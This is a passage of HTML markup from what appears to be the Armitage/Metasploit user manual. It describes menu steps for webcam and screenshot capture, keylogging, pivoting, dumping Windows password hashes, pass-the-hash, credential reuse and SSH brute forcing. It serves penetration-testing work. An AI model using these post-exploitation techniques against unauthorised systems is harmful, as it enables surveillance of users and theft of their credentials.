&lt;span style=&quot;background-color: white;&quot;&gt;You can reach a command shell for a host through&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Interact&amp;nbsp;-&amp;gt;&amp;nbsp;Command Shell. The Meterpreter shell is also available under the same parent menu.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Navigating to the&amp;nbsp;Meterpreter N&amp;nbsp;menu for each action gets old fast. Right-click inside the Meterpreter shell window to see the&amp;nbsp;Meterpreter N&amp;nbsp;menu items right away.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Close the command shell tab to kill the process associated with the command shell.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.7 VNC&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To interact with a desktop on a target host, go to&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;Interact&amp;nbsp;-&amp;gt;&amp;nbsp;Desktop (VNC). This will stage a VNC server into the memory of the current process and tunnel the connection through Meterpreter. Armitage will provide you the details to connect a local VNC client to your target.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.8 Screenshots and Webcam Spying&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To grab a screenshot use&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;Explore&amp;nbsp;-&amp;gt;&amp;nbsp;Screenshot. There is a&amp;nbsp;Webcam Shot&amp;nbsp;option in the same location. This option snaps a frame from the user&#39;s webcam.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Right-click a screenshot or webcam shot image to change the zoom for the tab. This zoom preference will stay, even if you refresh the image. Click&amp;nbsp;Refresh&amp;nbsp;to update the screenshot or grab another frame from the webcam. Click&amp;nbsp;Watch (10s)&amp;nbsp;to automatically snap a picture every ten seconds.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.9 Process Management and Key Logging&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Go to&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;Explore&amp;nbsp;-&amp;gt;&amp;nbsp;Show Processes&amp;nbsp;to see a list of processes on your victim. Use&amp;nbsp;Kill&amp;nbsp;to kill the highlighted processes.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Meterpreter runs in memory. It&#39;s possible to move Meterpreter from one process to another. This is called migration. Highlight a process and click&amp;nbsp;Migrate&amp;nbsp;to migrate to another process. Your session will have the permissions of that process.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;While in a process, it&#39;s also possible to see keystrokes from the vantage point of that process. Highlight a process and click&amp;nbsp;Log Keystrokes&amp;nbsp;to launch a module that migrates meterpreter and starts capturing keystrokes. If you key log from explorer.exe you will see all of the keys the user types on their desktop.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you choose to migrate a process for the purpose of key logging, you should duplicate your session first. If the process Meterpreter lives in closes, your session will go away.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.10 Post-exploitation Modules&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit has several post-exploitation modules too. Navigate the&amp;nbsp;&lt;em&gt;post&lt;/em&gt;&amp;nbsp;branch in the module browser. Double-click a module and Armitage will show a launch dialog. Armitage will populate the module&#39;s&amp;nbsp;SESSION&amp;nbsp;variable if a compromised host is highlighted. Each post-exploitation module will execute in its own tab and present its output to you there.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To find out which post-modules apply for a session: right-click a compromised host and navigate to&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;Explore&amp;nbsp;-&amp;gt;&amp;nbsp;Post Modules&amp;nbsp;or&amp;nbsp;Shell&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Post Modules. Clicking this menu item will show all applicable post-modules in the module browser.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit saves post-exploitation data into a Loot database. To view this data go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Loot.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may highlight multiple hosts and Armitage will attempt to run the selected post module against all of them. Armitage will open a new tab for the post module output of each session. This may lead to a lot of tabs. Hold down shift and clickX&amp;nbsp;on one of the tabs to close all tabs with the same name.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7. Maneuver&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.1 Pivoting&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit can launch attacks from a compromised host and receive sessions on the same host. This ability is called pivoting.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To create a pivot, go to&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;Pivoting&amp;nbsp;-&amp;gt;&amp;nbsp;Setup.... A dialog will ask you to choose which subnet you want to pivot through the session.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Once you&#39;ve set up pivoting, Armitage will draw a green line from the pivot host to all targets reachable by the pivot you created. The line will become bright green when the pivot is in use.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To use a pivot host for a reverse connection, set the&amp;nbsp;LHOST&amp;nbsp;option in the exploit launch dialog to the IP address of the pivot host.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.2 Scanning and External Tools&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Once you have access a host, it&#39;s good to explore and see what else is on the same network. If you&#39;ve set up pivoting, Metasploit will tunnel TCP connections to eligible hosts through the pivot host. These connections must come from Metasploit.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To find hosts on the same network as a compromised host, right-click the compromised host and go to&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;ARP Scan&amp;nbsp;or&amp;nbsp;Ping Sweep. This will show you which hosts are alive. Highlight the hosts that appear, right-click, and select&amp;nbsp;Scan&amp;nbsp;to scan these hosts using Armitage&#39;s MSF Scan feature. These scans will honor the pivot you set up.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;External tools (e.g., Nmap) will not use the pivots you&#39;ve set up. You may use your pivots with external tools through a SOCKS proxy though. Go to&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;SOCKS Proxy...&amp;nbsp;to launch the SOCKS proxy server.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The SOCKS4 proxy server is one of the most useful features in Metasploit. Launch this option and you can set up your web browser to connect to websites through Metasploit. This allows you to browse internal sites on a network like you&#39;re local. You may also configure&amp;nbsp;&lt;a href=&quot;http://proxychains.sourceforge.net/howto.html&quot;&gt;proxychains&lt;/a&gt;&amp;nbsp;on Linux to use almost any program through a proxy pivot.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.3 Password Hashes&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To collect Windows password hashes, visit&amp;nbsp;Meterpreter N&amp;nbsp;-&amp;gt;&amp;nbsp;Access&amp;nbsp;-&amp;gt;&amp;nbsp;Dump Hashes. You need administrative privileges to do this.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;There are two hash dumping options. One is the lsass method and the other is the registry method. The lsass method attempts to grab the password hashes from memory. This option works well against Windows XP/2003 era hosts. The registry method works well against modern Windows systems.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may view collected hashes through&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Credentials. For your cracking pleasure, the&amp;nbsp;Export&amp;nbsp;button in this tab will export credentials in pwdump format. You may also use the&amp;nbsp;Crack Passwords&amp;nbsp;button to run John the Ripper against the hashes in the credentials database.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.4 Pass-the-Hash&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;When you login to a Windows host, your password is hashed and compared to a stored hash of your password. If they match, you&#39;re in. When you attempt to access a resource on the same Windows domain, the stored hash is sent to the other host and used to authenticate you. With access to these hashes, you can use this mechanism to take over other hosts on the same domain. This is called a pass-the-hash attack.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use&amp;nbsp;Login&amp;nbsp;-&amp;gt;&amp;nbsp;psexec&amp;nbsp;to attempt a pass-the-hash attack against another Windows host. Click&amp;nbsp;Check all Credentials&amp;nbsp;to have Armitage try all hashes and credentials against the host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The pass-the-hash attack attempts to upload a file and create a service that immediately runs. Only administrator users can do this. Further, your targets must be on the same active directory domain for this attack to work.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.5 Using Credentials&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage will create a&amp;nbsp;Login&amp;nbsp;menu on each host with known services. Right-click a host and navigate to&amp;nbsp;Login&amp;nbsp;-&amp;gt;&lt;em&gt;service&lt;/em&gt;. This will open a dialog where you may choose a username and password from the credentials known to Metasploit.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Some services (e.g., telnet and ssh) will give you a session when a login succeeds. Others will not.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Check the&amp;nbsp;Try all credentials&amp;nbsp;option and Metasploit will login to the service with each of the known credentials. Metasploit automatically adds each successful login to the credentials table for you.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The best way into a network is through valid credentials. Remember that a successful username/password combination from one service may give you access to another host that you couldn&#39;t exploit.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;7.6 Password Brute Force&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit can attempt to guess a username and password for a service for you. This capability is easy to use through the module browser.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit supports brute forcing through the auxiliary modules named&amp;nbsp;&lt;em&gt;service_login&lt;/em&gt;. Type&amp;nbsp;&lt;code&gt;login&lt;/code&gt;&amp;nbsp;in the module browser to search for them.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To brute force a username and password over SSH, browse to&amp;nbsp;&lt;em&gt;auxiliary/scanner/ssh/ssh_login&lt;/em&gt;&amp;nbsp;in the modules panel and double click it.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you know the username, set the&amp;nbsp;USERNAME&amp;nbsp;variable. If you&#39;d like Metasploit to brute force the username, select a value for&amp;nbsp;USER_FILE. Double click the&amp;nbsp;USER_FILE&amp;nbsp;variable to bring up a file chooser where you can select a text file containing a list of usernames.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit has many files related to brute forcing in the&amp;nbsp;&lt;em&gt;[metasploit install]/data/wordlists&lt;/em&gt;&amp;nbsp;directory.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Set the&amp;nbsp;PASS_FILE&amp;nbsp;variable to a text file containing a list of passwords to try.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;re only brute forcing one host and you have a lot of usernames/passwords to try, I recommend using an external tool like Hydra. Metasploit does not make several parallel connections to a single host to speed up the process. This lesson can be taken one step further--use the right tool for each job.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;8. Team Metasploit&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;8.1 Remote Connections&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You can use Armitage to connect to an existing Metasploit instance on another host. Working with a remote Metasploit instance is similar to working with a local instance. Some Armitage features require read and write access to local files to work. Armitage&#39;s team server adds these features and makes it possible for Armitage clients to use Metaspoit remotely.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Connecting to a remote Metasploit requires starting a Metasploit RPC server and Armitage&#39;s team server server.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;8.2 Multi-Player Metasploit Setup&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/download&quot;&gt;Armitage Linux&lt;/a&gt;&amp;nbsp;package comes with a&amp;nbsp;&lt;a href=&quot;http://www.fastandeasyhacking.com/download/armitage/teamserver&quot;&gt;teamserver script&lt;/a&gt;&amp;nbsp;that you may use to start Metasploit&#39;s RPC daemon and Armitage&#39;s team server with one command. To run it:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;code style=&quot;background-color: white;&quot;&gt;cd /path/to/armitage&lt;br /&gt;./teamserver&amp;nbsp;&lt;em&gt;[external IP address]&lt;/em&gt;&amp;nbsp;&lt;em&gt;[password]&lt;/em&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;This script assumes armitage.jar is in the current folder. Make sure the external IP address is correct (Armitage doesn&#39;t check it) and that your team can reach port 55553 on your attack host. That&#39;s it.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit&#39;s RPC daemon and the Armitage team server are not GUI programs. You may run these over SSH.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The Armitage team server communicates over SSL. When you start the team server, it will present a server fingerprint. This is a SHA-1 hash of the server&#39;s SSL certificate. When your team members connect, Armitage will present the hash of the certificate the server presented to them. They should verify that these hashes match.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Do not connect to 127.0.0.1 when a teamserver is running. Armitage uses the IP address you&#39;re connecting to determine whether it should use SSL (teamserver, remote address) or non-SSL (msfrpcd, localhost). You may connect Armitage to your teamserver locally, use the [external IP address] in the Host field.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage&#39;s red team collaboration setup is CPU sensitive and it likes RAM. Make sure you have 1.5GB of RAM in your team server.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;8.3 Multi-Player Metasploit&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage&#39;s red team collaboration mode adds a few new features. These are described here:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;View&amp;nbsp;-&amp;gt;&amp;nbsp;Event Log&amp;nbsp;opens a shared event log. You may type into this log and communicate as if you&#39;re using an IRC chat room. In a penetration test this event log will help you reconstruct major events.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Metasploit Team Support in Armitage&quot; border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/collaboratearmitage.png&quot; width=&quot;850&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Multiple users may use any Meterpreter session at the same time. Each user may open one or more command shells, browse files, and take screenshots of the compromised host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit shell sessions are automatically locked and unlocked when in use. If another user is interacting with a shell, Armitage will warn you that it&#39;s in use.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
